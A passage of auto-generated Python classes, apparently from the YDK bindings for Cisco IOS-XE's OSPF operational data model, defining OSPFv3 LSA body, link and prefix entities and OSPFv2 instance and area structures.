self._leafs = OrderedDict([
('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
])
self.lsa_flag_options = Bits()
self.lsa_body_flags = Bits()
self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter()
self.ia_router.parent = self
self._children_name_map["ia_router"] = "ia-router"
self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal()
self.lsa_external.parent = self
self._children_name_map["lsa_external"] = "lsa-external"
self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa()
self.nssa.parent = self
self._children_name_map["nssa"] = "nssa"
self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData()
self.link_data.parent = self
self._children_name_map["link_data"] = "link-data"
self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix()
self.ia_prefix.parent = self
self._children_name_map["ia_prefix"] = "ia-prefix"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
"""
OSPFv3 network
.. attribute:: attached_router
List of the routers attached to the network
**type**\: list of int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_net_options
Network LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
])
self.attached_router = []
self.lsa_net_options = Bits()
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
"""
OSPFv3 inter area prefix
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ia_prefix
Inter area Prefix
**type**\: str
**config**\: False
.. attribute:: ia_prefix_options
Inter area prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
])
self.metric = None
self.ia_prefix = None
self.ia_prefix_options = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
"""
OSPFv3 inter area router
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: destination_router_id
Router ID of the router being described by the LSA
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_ia_options
Inter area LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__()
self.yang_name = "ia-router"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
])
self.metric = None
self.destination_router_id = None
self.lsa_ia_options = Bits()
self._segment_path = lambda: "ia-router"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
"""
OSPFv3 LSA external
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flags
LSA Flags
**type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags>`
**config**\: False
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: external_prefix
Prefix
**type**\: str
**config**\: False
.. attribute:: external_prefix_options
Prefix options
**type**\: str
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__()
self.yang_name = "lsa-external"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
"""
LSA Flags
.. attribute:: e_flag
When set, the metric specified is a Type 2 external metric
**type**\: bool
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
"""
OSPFv3 NSSA
.. attribute:: lsa_nssa_external
NSSA LSA
**type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__()
self.yang_name = "nssa"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))])
self._leafs = OrderedDict()
self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal()
self.lsa_nssa_external.parent = self
self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
self._segment_path = lambda: "nssa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
"""
NSSA LSA
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flags
LSA Flags
**type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags>`
**config**\: False
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: external_prefix
Prefix
**type**\: str
**config**\: False
.. attribute:: external_prefix_options
Prefix options
**type**\: str
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__()
self.yang_name = "lsa-nssa-external"
self.yang_parent_name = "nssa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-nssa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
"""
LSA Flags
.. attribute:: e_flag
When set, the metric specified is a Type 2 external metric
**type**\: bool
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-nssa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
class LinkData(Entity):
"""
OSPFv3 Link data
.. attribute:: rtr_priority
Router priority of the interce
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: link_local_interface_address
The originating router's link\-local interface address on the link
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: num_of_prefixes
Number of prefixes
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_id_options
Link data LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__()
self.yang_name = "link-data"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
])
self.rtr_priority = None
self.link_local_interface_address = None
self.num_of_prefixes = None
self.lsa_id_options = Bits()
self._segment_path = lambda: "link-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
class IaPrefix(Entity):
"""
OSPFv3 Intra area prefixes
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_adv_router
Referenced Advertising Router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: num_of_prefixes
Number of prefixes
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__()
self.yang_name = "ia-prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
])
self.referenced_ls_type = None
self.referenced_link_state_id = None
self.referenced_adv_router = None
self.num_of_prefixes = None
self._segment_path = lambda: "ia-prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
class Ospfv3Link(Entity):
"""
OSPFv3 links
.. attribute:: interface_id (key)
Interface ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: neighbor_interface_id (key)
Neighbor interface ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: neighbor_router_id (key)
Neighbor router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: metric
Metric
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__()
self.yang_name = "ospfv3-link"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.interface_id = None
self.neighbor_interface_id = None
self.neighbor_router_id = None
self.type = None
self.metric = None
self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
class Ospfv3Prefix(Entity):
"""
OSPFv3 prefix\-list
.. attribute:: prefix (key)
Prefix
**type**\: str
**config**\: False
.. attribute:: prefix_options
Prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__()
self.yang_name = "ospfv3-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
"""
OSPFv3 intra\-area prefix\-list
.. attribute:: prefix (key)
Prefix
**type**\: str
**config**\: False
.. attribute:: prefix_options
Prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__()
self.yang_name = "ospfv3-ia-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
class MultiTopology(Entity):
"""
OSPF multi\-topology interface augmentation
.. attribute:: name (key)
One of the topology enabled on this interface
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.MultiTopology, self).__init__()
self.yang_name = "multi-topology"
self.yang_parent_name = "ospf-instance"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
])
self.name = None
self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.MultiTopology, ['name'], name, value)
class Ospfv2Instance(Entity):
"""
The OSPF instance
.. attribute:: instance_id (key)
The routing instance identifier assigned to the OSPF instance
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf_name
The name of the Virtual Routing and Forwarding instance that the OSPF instance is operating within
**type**\: str
**config**\: False
.. attribute:: router_id
The router identifer assigned to the OSPF instance
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ospfv2_area
The OSPF area information
**type**\: list of :py:class:`Ospfv2Area <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area>`
**config**\: False
.. attribute:: ospfv2_lsdb_external
The external LSDB information
**type**\: list of :py:class:`Ospfv2LsdbExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance, self).__init__()
self.yang_name = "ospfv2-instance"
self.yang_parent_name = "ospf-oper-data"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['instance_id']
self._child_classes = OrderedDict([("ospfv2-area", ("ospfv2_area", OspfOperData.Ospfv2Instance.Ospfv2Area)), ("ospfv2-lsdb-external", ("ospfv2_lsdb_external", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal))])
self._leafs = OrderedDict([
('instance_id', (YLeaf(YType.uint32, 'instance-id'), ['int'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])),
])
self.instance_id = None
self.vrf_name = None
self.router_id = None
self.ospfv2_area = YList(self)
self.ospfv2_lsdb_external = YList(self)
self._segment_path = lambda: "ospfv2-instance" + "[instance-id='" + str(self.instance_id) + "']"
self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance, ['instance_id', 'vrf_name', 'router_id'], name, value)
class Ospfv2Area(Entity):
"""
The OSPF area information
.. attribute:: area_id (key)
The area identifier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ospfv2_lsdb_area
The OSPF Link State Database information for this area
**type**\: list of :py:class:`Ospfv2LsdbArea <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea>`
**config**\: False
.. attribute:: ospfv2_interface
A list of interfaces that belong to the area
**type**\: list of :py:class:`Ospfv2Interface <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area, self).__init__()
self.yang_name = "ospfv2-area"
self.yang_parent_name = "ospfv2-instance"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['area_id']
self._child_classes = OrderedDict([("ospfv2-lsdb-area", ("ospfv2_lsdb_area", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea)), ("ospfv2-interface", ("ospfv2_interface", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface))])
self._leafs = OrderedDict([
('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])),
])
self.area_id = None
